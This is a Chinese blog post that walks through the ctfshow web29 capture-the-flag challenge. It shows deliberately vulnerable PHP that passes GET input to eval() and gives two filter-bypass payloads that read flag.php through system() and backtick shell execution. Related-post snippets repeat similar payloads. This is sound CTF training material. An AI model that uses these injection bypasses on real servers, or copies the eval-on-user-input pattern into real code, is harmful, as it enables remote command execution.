ctfshow-web入门-命令执行-web29

已于 2022-06-21 19:42:38 修改
阅读量316 收藏 1
点赞数
分类专栏: #命令执行 ctfshow 文章标签: web安全
于 2022-06-21 14:18:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/125388598
版权

常见绕过姿势小结_再认真点的博客-CSDN博客_大小写绕过原理

可以先看看大佬的绕过姿势总结

web29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    //如果在get到的c里匹配到字符串flag就过滤
    if(!preg_match("/flag/i", $c)){
        //eval可以命令执行
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

姿势一?c=system('tac fla?.php');

利用linux系统的通配符?绕过过滤flag

姿势二?c=echo `tac fl''ag.php`;

反引号的作用就是将反引号内的Linux命令先执行,然后将执行结果赋予变量。

由'' 、^() 符号并不会影响命令的执行,所以我们可以插入这些符号来绕过。

最低0.47元/天 解锁文章
HkD01L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW web入门——web30
m0_74093152的博客
04-23 254
passthru()函数同system()函数类似,都可以用来执行外部命令的,因此可以用passthru来代替system。因此构造payload:?把flag、system、php都给过滤了。查看页面源代码即可获得flag。
CTFshow 命令执行 web30
Kradress的博客
10-29 136
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
ctfshow-web入门-命令执行web29)五种解法绕过文件名检测
最新发布
Welcome To Myon'Blog !
06-06 457
它的 payload 里用到了两个连续的单引号,在一些系统中,连续的两个单引号会被解释为一个单引号,而不会被视为字符串的结尾,从而使得字符串拼接在一起。因此,"fl''ag.php" 被解释为 "flag.php",从而绕过对文件名的检测。第一题代码很简单,就是对 preg_match 绕过,只要提交的参数值不出现 flag 就行。这条命令的作用是输出指定文件的内容,并在每一行前面加上行号。可以看到 flag 就在当前目录下,叫 flag.php。写入成功,这里还是测了一会儿才弄好,注意对单引号的转义。
ctfshow-命令执行-web30
weixin_43400535的博客
10-28 436
ctfshow-web30 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
CTFshow web入门命令执行web29-web77)
小白的博客
05-10 1387
2、然后上传一个new2.php文件并抓包,多试几次,因为不一定生成的临时文件的最后一个字母是大写,文件内容如下。1、先构造一个文件上传的html页面,代码如下(test-fileupdown.html)3、在上传文件的过程中,抓包,之后添加参数c=.%20/?4、所以传入这个参数的意思就是匹配上传command.php所生成的临时文件,并执行。接着直接用cat flag.php查看一下flag.php文件就好了。略(与web41相同)
ctfshow web入门命令执行
uuzfumo的博客
12-17 1078
命令执行姿势
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
CTFshow 命令执行 web29-web40
m0_73121489的博客
06-25 258
过滤了反引号、左括号和分号,passthru、printf和echo都用不了,取反绕过也不行,多过滤了php和file,PHP伪协议用不了,只能用data协议。BP抓包,用HackBar传参之后没有内容回显。这题解法也差不多,数字换成字母就可以了。过滤了system,php,flag。涉及到一点文件包含,只过滤了flag。然后在源码里就可以看到flag。base64解码即得flag。法一:php://input。很简单,就过滤了flag。新姿势:嵌套文件包含。和web32一个解法。和web32一个解法。
CTFshow web命令执行29-36)
csjjjd的博客
02-07 1332
磨刀不误砍柴工,看了我之前的文章后,车速自然要加快,10分钟八道题转瞬即逝,苦于篇幅太长,剩下内容在下一篇文章。因为CTFshow后面flag不输出来的基本都藏在flag.php所以之后没有必要直接system(ls);当然你要用我文章其他命令也可以,都是降维打击的,是不是很爽!第二个命令就搞定了,接下来直接base64解码就好!,那直接第二条就搞定了。
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1305
ctfshow web29 web30 web31
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2731
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
ctfshow+web入门命令执行
m0_59448417的博客
05-27 842
ctfshow+web入门命令执行
CTFshow web入门命令执行总结
小白的博客
05-10 370
1、命令执行函数。
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1390
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1029
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值